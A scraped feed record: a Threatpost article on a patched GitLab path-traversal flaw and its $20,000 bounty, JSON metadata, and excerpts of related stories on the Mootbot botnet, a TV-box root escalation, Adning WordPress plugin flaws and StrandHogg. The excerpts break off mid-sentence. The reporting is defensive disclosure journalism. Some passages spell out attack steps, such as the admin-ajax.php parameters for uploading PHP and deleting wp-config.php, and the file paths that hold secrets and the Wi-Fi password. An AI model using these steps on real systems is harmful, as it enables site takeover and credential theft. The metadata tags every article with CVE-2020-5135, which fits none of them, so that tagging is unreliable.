A critical GitLab vulnerability, which could be leveraged by a remote attacker to execute code, recently netted a researcher a $20,000 bug-bounty award.
The flaw was reported to GitLab by software developer [William Bowling](<https://twitter.com/wcbowling>) via the [HackerOne bug bounty platform](<https://hackerone.com/reports/827052>) on March 23. It was then disclosed this week after being patched in GitLab version 12.9.1.
At issue is a path-traversal flaw in GitLab, which started out as a web-based Git repository manager but has moved into the DevOps lifecycle-management space. A path traversal is a web security flaw that allows an attacker to read arbitrary files on the server that is running an application. For this particular flaw, the ability to read arbitrary files on the server would give attackers access to tokens, private data, configs and more.
[](<https://threatpost.com/newsletter-sign/>)
Specifically the flaw exists in the UploadsRewriter function of GitLab, which is used to duplicate files. The UploadsRewriter does not validate the file name and path, allowing arbitrary files to be copied without restriction when moving issues to a new project.
“As there is no restriction on what file can be, path traversal can be used to copy any file,” said Bowling in his bug-bounty report. “The file or path should be validated before copying files.”
Bowling then took the flaw a step further, showcasing how it could be leveraged to launch a remote code-execution attack. Once the arbitrary file read flaw is exploited, he said, it can be used to grab the secret_key_base from the /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml service.
The secret_key_base is used to derive keys that are used to generate and verify encrypted or signed cookies. Once attackers access the secret_key_base, they could manipulate these cookie services to send cookies to the server to execute code.
GitLab verified the finding and escalated the issue to its engineering team, granting Bowling an initial $1,000 triage payment for his findings before ultimately granting the $20,000.
GitLab in December [announced it had awarded a total of $565,650](<https://threatpost.com/gitlab-doles-out-half-a-million-bucks-to-white-hats/151138/>) in security bug bounties to 171 researchers who reported valid vulnerabilities in the past year. GitLab launched its [bug-bounty program](<https://hackerone.com/gitlab>) in 2018, and according to Juan Broullon, senior application security engineer at the company, it received a total of 1,378 reports from 513 white-hat hackers in that time.
**_Inbox security is your best defense against today’s fastest growing security threat – phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**
_**Also, don’t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_
{"id": "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "type": "threatpost", "bulletinFamily": "info", "title": "Critical GitLab Flaw Earns Bounty Hunter $20K", "description": "A critical GitLab vulnerability, which could be leveraged by a remote attacker to execute code, recently netted a researcher a $20,000 bug-bounty award.\n\nThe flaw was reported to GitLab by software developer [William Bowling](<https://twitter.com/wcbowling>) via the [HackerOne bug bounty platform](<https://hackerone.com/reports/827052>) on March 23. It was then disclosed this week after being patched in GitLab version 12.9.1.\n\nAt issue is a path-traversal flaw in GitLab, which started out as a web-based Git repository manager but has moved into the DevOps lifecycle-management space. A path traversal is a web security flaw that allows an attacker to read arbitrary files on the server that is running an application. For this particular flaw, the ability to read arbitrary files on the server would give attackers access to tokens, private data, configs and more.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSpecifically the flaw exists in the UploadsRewriter function of GitLab, which is used to duplicate files. The UploadsRewriter does not validate the file name and path, allowing arbitrary files to be copied without restriction when moving issues to a new project.\n\n\u201cAs there is no restriction on what file can be, path traversal can be used to copy any file,\u201d said Bowling in his bug-bounty report. \u201cThe file or path should be validated before copying files.\u201d\n\nBowling then took the flaw a step further, showcasing how it could be leveraged to launch a remote code-execution attack. Once the arbitrary file read flaw is exploited, he said, it can be used to grab the secret_key_base from the /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml service.\n\nThe secret_key_base is used to derive keys that are used to generate and verify encrypted or signed cookies. Once attackers access the secret_key_base, they could manipulate these cookie services to send cookies to the server to execute code.\n\nGitLab verified the finding and escalated the issue to its engineering team, granting Bowling an initial $1,000 triage payment for his findings before ultimately granting the $20,000.\n\nGitLab in December [announced it had awarded a total of $565,650](<https://threatpost.com/gitlab-doles-out-half-a-million-bucks-to-white-hats/151138/>) in security bug bounties to 171 researchers who reported valid vulnerabilities in the past year. GitLab launched its [bug-bounty program](<https://hackerone.com/gitlab>) in 2018, and according to Juan Broullon, senior application security engineer at the company, it received a total of 1,378 reports from 513 white-hat hackers in that time.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "published": "2020-04-29T16:39:56", "modified": "2020-04-29T16:39:56", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://threatpost.com/critical-gitlab-flaw-bounty-20k/155295/", "reporter": "Lindsey O'Donnell", "references": ["https://twitter.com/wcbowling", "https://hackerone.com/reports/827052", "https://threatpost.com/newsletter-sign/", "https://threatpost.com/gitlab-doles-out-half-a-million-bucks-to-white-hats/151138/", "https://hackerone.com/gitlab", "https://register.gotowebinar.com/register/5064791868226032141?source=ART", "https://register.gotowebinar.com/register/5064791868226032141?source=ART", "https://register.gotowebinar.com/register/5064791868226032141?source=ART", "https://attendee.gotowebinar.com/register/4136632530104301068?source=art"], "cvelist": ["CVE-2020-5135"], "lastseen": "2020-10-14T22:25:55", "viewCount": 244, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "cisa", "idList": ["CISA:60BECD302CACD014F496544254DCB720"]}, {"type": "cve", "idList": ["CVE-2020-5135"]}, {"type": "nessus", "idList": ["SONICWALL_SNWLID-2020-0010.NASL"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "securelist", "idList": ["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F"]}, {"type": "thn", "idList": ["THN:D6FED8C7635FDB50C271368C9373B439"]}, {"type": "threatpost", "idList": ["THREATPOST:033645C929899D29D91092278D188D8E", "THREATPOST:0A238D67F7286BA41103801846210F7A", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:39625C47309704502299C3CF93814CFA", "THREATPOST:3A306ADED5369A8AA74DD95614F98FBD", "THREATPOST:3F81254E133ABD9AE724F95349C0040A", "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51EF909F29E9FE8B04A35A1E24E52C08", "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58C865E4F2AA34CD62938A2E6BBFDE44", "THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "THREATPOST:639CADC540E81321048EB418C2EC7586", "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "THREATPOST:701953AF963ADACDD2280B3D18B58493", "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "THREATPOST:718E4F36F0096BBE66CB2FAE28048810", "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:7BA8370AF04822DCF1A03C685AF16604", "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "THREATPOST:88ED6BF6458FC657DACB44E3795710C1", "THREATPOST:8A8E859062970130E3F91D160F03325C", "THREATPOST:8DA5404E0E8179BD2E87B8F221395859", "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "THREATPOST:8F6E27B46891F0167D7799A73F1A9380", "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB", "THREATPOST:97C27999457834C42771A5FB9EEAD852", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A43BC2773FE4FB67EB7B8F584F137132", "THREATPOST:A5D4FD6C2281AE395B821A8D0EB5736D", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:ABBA6B89522F29EE1F01F3D010F46FC0", "THREATPOST:AD7CBD7ADE9D9F9DE3BBDB1AE8A6F81D", "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "THREATPOST:B18EFE773F83789508C61F27321B9FAA", "THREATPOST:B313D27399CB1B0B0727DC338B57B95E", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5964CC2880F7E4AFF1E9C5DEEE5B287", "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "THREATPOST:B6946D18AC7359473DB43051174C70B0", "THREATPOST:B9A8F6E46618F5253194C38A1808CF9C", "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "THREATPOST:BED35CFCFED307909DB60602551982A6", "THREATPOST:C22F323F8CA203A50435F11517317613", "THREATPOST:C4650E22534F775312B3885DAA306DDA", "THREATPOST:C4D1E87CE4261EC62077E4F157643132", "THREATPOST:C51D2F2366676BB018956D93916AC33E", "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "THREATPOST:D2BB5A9DDB021A7E256A4E0D8A6BDA55", "THREATPOST:D3F7F2434B9347169B642A60BEC9FF02", "THREATPOST:D4F89B42660582EFECA648A891470AD4", "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "THREATPOST:DB4FE6FEC73D65579261FF6697220766", "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "THREATPOST:E54A6B6E04C21B79F588B156DC5704F8", "THREATPOST:E95F180BE3CA693890795666169A5F04", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:EFC1ED7D43C4F52F844E131EAE00990F", "THREATPOST:EFC814A6564326F98824AC875F125E0D", "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "THREATPOST:F334DD851AFA845C7A29CB75F55E8128", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "cisa", "idList": ["CISA:60BECD302CACD014F496544254DCB720"]}, {"type": "cve", "idList": ["CVE-2020-5135"]}, {"type": "nessus", "idList": ["SONICWALL_SNWLID-2020-0010.NASL"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "securelist", "idList": ["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F"]}, {"type": "thn", "idList": ["THN:D6FED8C7635FDB50C271368C9373B439"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:701953AF963ADACDD2280B3D18B58493", "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "THREATPOST:DFC75A06F449D25EF03338C5D80C705C"]}]}, "exploitation": null, "vulnersScore": 0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659743467}}
{"threatpost": [{"lastseen": "2020-10-14T22:26:16", "description": "[](<https://register.gotowebinar.com/register/4136632530104301068?source=art>)The Mootbot botnet has been using a pair of zero-day exploits to compromise multiple types of fiber routers. According to researchers, other botnets have attempted to do the same, but have so far failed.\n\nAccording to researchers at NetLab 360, the operators of the Mootbot botnet in late February started to exploit a zero-day bug found in nine different types of fiber routers used to provide internet access and Wi-Fi to homes and businesses (including the Netlink GPON router). The flaw is a remote code-execution bug with a public proof-of-concept (PoC) exploit \u2013 but for it to be used successfully to compromise a target router, it must be paired with a second vulnerability.\n\n\u201cIt is likely most of the vendors are OEM products of the same original vendor,\u201d the firm explained in a [recent posting](<https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/>). However, NetLab 360 said that it wouldn\u2019t release the original vendor\u2019s name nor details of the second bug, because the vendor told the security firm that it didn\u2019t see the bug as viable.\n\n\u201cOn March 17, we confirmed the exploit was a 0-day and reported the result to CNCERT,\u201d according to the analysis. \u201cWe also contacted the vendor but was told this problem should not be happening because the default config of the device should not have this issue (the reality is different). So they won\u2019t take this case from us.\u201d\n\nDespite that initial assessment, a PoC code for the bug emerged on ExploitDB a day later. And a day after that, on March 19, the firm saw attacks in the wild using the PoC to attempt to spread the Gafgyt botnet. A few days later, the botnet had adopted the PoC as part of a worming attempt to move from router to router. Meanwhile, on March 24, another wave of exploit attempts emerged using the PoC, this time trying to spread the Fbot botnet.\n\n\u201cThe PoC lefts out a crucial prerequisite \u2013 another vulnerability needs to be used together with this PoC for it to work,\u201d researchers explained. \u201cSo, a successful execution of the injected commands will not have the target device compromised.\u201d\n\nMoobot is a new botnet family based on [Mirai botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>), which targets internet of things (IoT) devices. While most IoT botnets go after gear that may have weak or default passwords, Mootbot stands out for its use of zero-day exploits, researchers said. It\u2019s worth noting that the malware [was also seen in March](<https://threatpost.com/hackers-exploited-0-day-cctv-camera/154051/>) using multiple zero days to target LILIN DVR and IP cameras.\n\nThough it didn\u2019t release details of the second success factor in the kill chain, NetLab 360 recommended that to protect against the threat, users that have fiber-based internet access routers should check and update their device firmware, and check whether there are default accounts that should be disabled.\n\nJack Mannino, CEO at nVisium, told Threatpost that the [focus on routers](<https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/>) offers attackers certain advantages.\n\n\u201cControlling network infrastructure will always be an appealing attacker goal because of the springboard it provides for launching future attacks,\u201d he said. \u201cAs a software developer, it\u2019s important to consider that the networks your users access your product from may be compromised, and build this into your threat models. Whether it\u2019s the level of access it provides to network traffic, or the chokepoints and amplifiers for DDoS attacks they present, previous botnets, such as Mirai, gave us a glimpse into what these campaigns can achieve. More security teams focus on their Patch Tuesday fixes than updating the devices they frequently expose directly to the internet.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-20T20:51:59", "type": "threatpost", "title": "Mootbot Botnet Targets Fiber Routers with Dual Zero-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-20T20:51:59", "id": "THREATPOST:E95F180BE3CA693890795666169A5F04", "href": "https://threatpost.com/mootbot-fiber-routers-zero-days/154962/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:07:48", "description": "A critical bug in the Hindotech HK1 TV Box would allow root-privilege escalation thanks to improper access control. A successful exploit would allow attackers to steal social-networking account tokens, Wi-Fi passwords, cookies, saved passwords, user-location data, message history, emails, contacts and more, researchers said.\n\nThe bug, which is awaiting a CVE assignment, comes in at 9.3 out of 10 on the [CvSS severity scale](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&version=3.1>), according to researchers at Sick.Codes, a security resource for developers.\n\nThe HK1 Box S905X3 TV Box is an Android-based streaming box that plugs into a TV and allows users to access YouTube, Netflix and other streaming content \u201cover-the-top,\u201d i.e., without a cable subscription. Users can also sign into their favorite email, music and social-networking-related apps for a full \u201csmart TV\u201d experience. It retails for under $100.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nThe vulnerability would allow a local, unprivileged user to escalate to root, the Sick.Codes team said [in a posting](<https://sick.codes/sick-2020-004/>) this week. At issue is a lack of authentication when it comes to the debugging functions of the set-top \u2013 specifically, when connected to the device through the serial port (UART), or while using the [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>) (adb), as an unprivileged user.\n\nadb is a versatile command-line tool that lets users communicate with a device. It facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that can be used to run a variety of commands on a device.\n\n\u201cA local attacker using adb, or a physical attacker connecting to the device through the UART serial debugging port, is dropped into a shell as the \u2018shell\u2019 user without entering a username or password,\u201d researchers explained. \u201cOnce logged in as the \u2018shell\u2019 user, the attacker can escalate to root using the /sbin/su binary which is group executable (750), or /system/xbin/su which is executable by all users (755).\u201d\n\nOnce endowed with root privileges, the attacker can view any of the information for the apps the user is signed into \u2013 paving the way for stealing access tokens, passwords, contacts and messages and more. Attackers could also use the HK1 Box maliciously to sniff other devices on the same network, usually in a home-networking environment, according to the analysis.\n\n\u201cFor example, once root, the network Wi-Fi password can be read in plain text at /data/misc/wifi/WifiConfigStore.xml,\u201d researchers explained.\n\nThus far, the issue has not been addressed.\n\nThe vendor for the device is the Shenzhen Hindo Technology Co.,Ltd., based just outside of Hong Kong. The researchers were unable to contact the company (and its website, [www.hindotech.com](<http://www.hindotech.com>), was down as of the time of writing). Instead, the researchers submitted a draft advisory to Amlogic, which shares branding with the device in the States \u2013 and received no response.\n\nThreatpost has tried to contact Shenzhen Hindo but has been unsuccessful in reaching the company.\n\nThis is only the latest entertainment-related security bug. Last week, researchers disclosed the [\u2018WarezTheRemote\u2019 attack](<https://threatpost.com/comcast-tv-remote-homes-snooping/159899/>), affecting Comcast\u2019s XR11 voice remote control. A security flaw would allow attackers to remotely snoop in on victims\u2019 private conversations.\n\nThe flaw stems from Comcast\u2019s XR11, a popular voice-activated remote control for cable TV, which has more than 18 million units deployed across the U.S. The remote enables users to say the channel or content they want to watch rather than keying in the channel number or typing to search.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:36:15", "type": "threatpost", "title": "Authentication Bug Opens Android Smart-TV Box to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-13T16:36:15", "id": "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "href": "https://threatpost.com/authentication-bug-android-smart-tv-data-theft/160025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:12", "description": "The Adning Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nThe plugin\u2019s author, Tunafish, has rolled out a patched version (v.1.5.6), which site owners should update to as soon as possible. No CVE was issued.\n\nThe bug could allow complete site takeover, earning it a 10 out of 10 on the CVSS bug-severity scale. Also, it has already been the subject of in-the-wild attacks, according to [an analysis](<https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/>) from Wordfence issued on Wednesday. That said, the firm said the attacks so far have been limited in scope and scale.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw exists in the Adning plugin\u2019s ability to allow users to upload banner images, researchers said.\n\n\u201cIn order to provide this functionality, it used an AJAX action, _ning_upload_image,\u201d according to the researchers. \u201cUnfortunately, this AJAX action was available with a nopriv_ hook, meaning that any visitor to the site could make use of it, even if they were not logged in. Additionally, the function called by this AJAX action also failed to make use of a capability check or a nonce check.\u201d\n\nThis function also allowed the user to supply the \u201callowed\u201d file types \u2013 which means that an unauthenticated attacker could upload malicious code by sending a POST request to wp-admin/admin-ajax.php.\n\nThis could be performed \u201cwith the action parameter set to _ning_upload_image the allowed_file_types set to php and a files parameter containing a malicious PHP file,\u201d researchers said. \u201cAlternatively, an attacker could set the allowed_file_types to zip and upload a compressed archive containing a malicious PHP file, which would be unzipped after upload.\u201d\n\n## **A Second Bug**\n\nWordfence researchers also found a second security vulnerability, which allows unauthenticated arbitrary file deletion via path traversal.\n\nCarrying a high-severity CVSS score of 8.7, this bug is also patched in v.1.5.6.\n\n\u201cIn order to delete any uploaded images, the plugin also registered another ajax action, _ning_remove_image, which also used a nopriv_ hook,\u201d according to the analysis. \u201cAs with the upload vulnerability, this function did not perform a capability check or a nonce check. As such it was possible for an unauthenticated attacker to delete arbitrary files using path traversal.\u201d\n\nAlso, according to Wordfence, if an attacker were able to delete the specific file wp-config.php, the site would be reset, offering attackers an opportunity to set it up again. They could use their own remote databases under their control, effectively replacing the site\u2019s content with their own content.\n\n\u201cThis might require an extra step of preparation, which is that the wp-content/uploads/path folder would need to exist,\u201d according to Wordfence. \u201cHowever, since the previously mentioned arbitrary file-upload vulnerability allowed for directory creation, this was not a major obstacle. Once the directory was created, an attacker could send a POST request to wp-admin/admin-ajax.php with the action parameter set to _ning_remove_image, the uid parameter set to /../../.. and the src parameter set to wp-config.php.\u201d\n\n## **WordPress Plugins: A Weak Link**\n\nWordPress plugins continue to crop up with concerning vulnerabilities that put sites at risk. In May for instance, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>). Also that month, a pair of security vulnerabilities (one of them critical), in the WordPress search engine optimization (SEO) plugin known as Rank Math, [were found](<https://threatpost.com/critical-wordpress-plugin-bug-lock-admins-out/154354/>). They could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. RankMath is a WordPress plugin with more than 200,000 installations.\n\nIn March, another critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d [was found](<https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/>) that could open the door for remote code execution in 44,000 websites.\n\nAlso in March, two vulnerabilities \u2013 including a high-severity flaw \u2013 [were patched](<https://threatpost.com/wordpress-plugin-bug-popup-builder/153715/>) in a popular WordPress plugin called Popup Builder. The more severe flaw could enable an unauthenticated attacker to infect malicious JavaScript into a popup \u2013 potentially opening up more than 100,000 websites to takeover.\n\nAnd in February, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked. And, earlier that month, a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>). The flaw could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a _**[**_FREE webinar_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_, \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>)**_ for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-07-08T20:12:05", "type": "threatpost", "title": "Advertising Plugin for WordPress Threatens Full Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-07-08T20:12:05", "id": "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "href": "https://threatpost.com/advertising-plugin-wordpress-full-site-takeovers/157283/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:09", "description": "Researchers have discovered a new Android vulnerability that could allow malware to pose as popular apps and ask for various permissions, potentially allowing hackers to listen in on users, take photos, read and send SMS messages, and basically take over various functions as if they are the device\u2019s owner.\n\nSecurity researchers John H\u00f8egh-Omdal, Caner Kaya and Markus Ottensmann at Norwegian app-security provider [Promon](<https://promon.co/>) discovered the flaw\u2014which they dubbed \u201cStrandHogg\u201d from old Norse for the Viking tactic of plundering villages and holding people for ransom. They said attackers can use the vulnerability to allow \u201creal-life malware to pose as legitimate apps, with users unaware they are being targeted,\u201d according to a [blog post](<https://promon.co/security-news/strandhogg/>).\n\n\u201cThe attack can be designed to request permissions which would be natural for different targeted apps to request, in turn lowering suspicion from victims,\u201d researchers wrote. \u201cUsers are unaware that they are giving permission to the hacker and not the authentic app they believe they are using.\u201d[](<https://threatpost.com/newsletter-sign/>)\n\nIf the flaw is exploited, to users it appears that they are clicking on an app that they use every day, such as Facebook or Instagram. However, what happens when they click on the app is that instead of the app a user intended to open starting up, malware is deployed that can give permissions to the hacker, who is directed to the legitimate app, researchers said.\n\nThe flaw, which can be exploited by \u201creal-life malware,\u201d affects all Android devices, including those running Android 10, they said, as well as puts the top 500 most popular apps at risk.\n\nResearchers from Promon partner Lookout already have identified 36 malicious apps exploiting the vulnerability, which can be done without gaining root access to the device, according to the post. Among those apps were variants of the BankBot Trojan\u2014widespread malware that\u2019s been detected all over the world\u2013observed as early as 2017, researchers said.\n\nMoreover, the persistent problem of malware slipping under the radar on Google Play is what appears to be responsible for the spread of malicious code that exploits the flaw, researchers said. While the specific malware sample that Promon researchers analyzed did not reside on the app store, it was installed through several dropper apps/hostile downloaders distributed on Google Play, they said.\n\nWhile 